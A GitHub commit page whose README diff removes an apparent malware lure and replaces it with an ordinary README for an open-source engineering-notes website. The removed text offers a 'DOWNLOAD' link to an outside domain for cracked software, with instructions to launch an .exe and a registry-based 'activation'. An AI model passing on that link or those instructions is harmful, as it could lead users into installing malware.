Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
NageshMandal committed Sep 9, 2024
1 parent 0204b36 commit 3e5e3a7
Showing 1 changed file with 125 additions and 18 deletions.
143 changes: 125 additions & 18 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,24 +1,131 @@
# Defi
# ENGINEERING-NOTES-WEBSITE

## ⚠️ Disclaimer
This repository is for educational purposes only. Distributing or using this software without a valid license is illegal and may result in severe legal consequences. The authors of this repository are not responsible for any misuse or damage caused by using this software.
# [DOWNLOAD](https://sys-shelter.pro/share/GIthubSoft)
Welcome to Engineering Notes, a website dedicated to providing handwritten notes to students free of cost. This project is open source, and we encourage contributions from the community to make it even better!

## 🛠 Features
- Enhanced Performance: Experience optimized performance and full functionality.
- Customizable Settings: Tailor the software to your specific needs with a range of settings.
- Secure & Reliable: Utilize all security features to ensure your data remains protected.

## 🔑Activation license
### This project is a part of the following Open Source Program

- This script applies the registry lock method to activate.
- This method requires the Internet at the time of activation.
<div align="center">
<a href="https://gssoc.girlscript.tech/">
<img width="65%"
src="https://camo.githubusercontent.com/254612e762d0ee6a52de5d455d24b2be371f8c2f351c03d37d6c4b370b445b98/68747470733a2f2f692e706f7374696d672e63632f6b34306e747356342f31353030783530302e6a7067" />
</a>
</div>

## 🚀 Usage
1. Launch .exe
<br>
<div align="center">

## 🔄 Updates
Check this repository regularly for updates and improvements. Contributions are welcome!
[![Issues](https://img.shields.io/github/issues/NageshMandal/Engineering-Notes-Website)](https://github.com/NageshMandal/Engineering-Notes-Website/Issues)
[![Pull Requests](https://img.shields.io/github/issues-pr/NageshMandal/Engineering-Notes-Website)](https://github.com/NageshMandal/Engineering-Notes-Website/Pulls)
[![Forks](https://img.shields.io/github/forks/NageshMandal/Engineering-Notes-Website)](https://github.com/NageshMandal/Engineering-Notes-Website/network/members)
[![Repo Size](https://img.shields.io/github/repo-size/NageshMandal/Engineering-Notes-Website?color=yellow)](https://github.com/NageshMandal/Engineering-Notes-Website)
[![stars](https://img.shields.io/github/stars/NageshMandal/Engineering-Notes-Website?style=social)](https://github.com/NageshMandal/Engineering-Notes-Website/stargazers)

## ❗️ Legal Notice
This repository and its content are intended for educational purposes only. Unauthorized use or distribution of this software may violate laws in your jurisdiction. Please respect the rights of software developers by purchasing a legitimate license if you find the software useful.
</div>

<div align= "center">
<img src="https://img.shields.io/badge/HTML5-E34F26?style=for-the-badge&logo=html5&logoColor=white"/>
<img src="https://img.shields.io/badge/CSS-239120?&style=for-the-badge&logo=css3&logoColor=white"/>
<img src="https://img.shields.io/badge/JavaScript-F7DF1E?style=for-the-badge&logo=javascript&logoColor=black"/>
<img src="https://img.shields.io/badge/Bootstrap-563D7C?style=for-the-badge&logo=bootstrap&logoColor=white"/>

</div>

<br><hr>


## Table of Contents

- [Screenshots](#screenshots)
- [Getting Started](#getting-started)
- [Contributing](#contributing)
- [License](#license)

<hr>




## Screenshots
<br>
<div align = "center">

<img src="images\ss-1.PNG" width="200" height="200">
&nbsp
<img src="images\college1.png" width="200" height="200">
&nbsp
<img src="images\ss-2.PNG" width="200" height="200">
&nbsp

</div>

<br><hr>


## Getting Started

Include instructions on how to get started with your project. This may include:

1. Star the repository⭐: Show your support and appreciation by starring the repository.

2. Fork the repository 🍴: Fork the project to your own GitHub account to start making your contributions.

3. Clone your forked copy of the project🌀: Clone the forked repository to your local machine to work on it.

4. How to run the project locally: Explore the website and its features on your local machine to see how it functions.

## Contributing

We welcome contributions from everyone. Here are some guidelines to get started:

1. Star the repository⭐
2. Fork the repository 🍴
3. Clone your forked copy of the project🌀

`Git clone https://github.com/your_username/Engineering-Notes-Website.git`

4. Navigate to the project directory.

`cd Engineering-Notes-Website`
5. Create a new branch:

`git checkout -b YourBranchName`
6. Make changes in source code.

7. Stage your changes and commit

`git add .
git commit -m "<your_commit_message>"`
8. Push your local commits to the remote repo.

`git push origin YourBranchName`

<hr>

<h1 align=center> Project Admins </h1>
<p align="center">
<table>
<tr>
<td align="center"><a href="https://github.com/NageshMandal"><img alt=""
src="https://avatars.githubusercontent.com/u/106006006?v=4" width="200px;"><br><sub><b> Nagesh Mandal
</b></sub></a><br></td> </a></td>
</table>

<h1 align=center> Contributors </h1>
<p align="center">
<a href="https://github.com/ssitvit/Games-and-Go/graphs/contributors">
<img src="https://contrib.rocks/image?repo=NageshMandal/Engineering-Notes-Website"/>
</a></p>

Thanks go to these **Wonderful People**: **Contributions** of any kind are welcome!

> Mention the people who successfully contributed to your project as contributors.
<hr>
## License
[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)

Let's work together to create an amazing platform for students to access free engineering notes! 📚✨

Terms and conditions for use, reproduction and distribution are under the [MIT License](https://opensource.org/license/mit/).

Feel free to contribute to this repo.

0 comments on commit 3e5e3a7

Please sign in to comment.